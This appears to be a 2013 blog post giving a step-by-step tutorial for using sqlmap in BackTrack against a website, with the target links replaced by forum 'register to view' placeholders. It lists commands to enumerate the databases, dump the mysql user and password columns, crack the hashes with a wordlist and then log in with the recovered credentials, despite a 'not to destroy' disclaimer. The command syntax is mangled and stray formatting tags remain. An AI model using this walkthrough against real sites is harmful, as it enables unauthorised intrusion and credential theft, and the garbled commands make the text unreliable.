Friday 1 March 2013

BACKTRACK SQL PENETRATION

this tutorial is just to show how to test the site with sqlmap in backtrack and not to destroy


the focus here is You are not allowed to view links. Register or Login to view.

opens a window to start terminal and typing the following commands


1 - cd / pentest / web / scanners / sqlmap
2 - python-u sqlmap.py You are not allowed to view links. Register or Login to view. - dbs
3 - y (answer yes to the question)
4 - sqlmap.py python-u mysql-D You are not allowed to view links. Register or Login to view. - tables
5 - python-u sqlmap.py You are not allowed to view links. Register or Login to view. T-mysql user - columns
6 - python-u sqlmap.py You are not allowed to view links. Register or Login to view. mysql-D-T-C User user - dump
7 - python-u sqlmap.py You are not allowed to view links. Register or Login to view. mysql-D-C-T user Password - dump
8 - y
9 - / pentest / web / scanners / sqlmap / txt / wordlist.txt
(you hit it right after the question what's the dictionary's location? [/ pentest / web / scanners / sqlmap / txt / wordlist.txt] "... here ...")

10 - y (answer yes to the question)

Now we must look to the authentication page and enter the name of luser and password with the correct user and password[/b][/b][/b][/b][/u][/u]

0 comments:

Post a Comment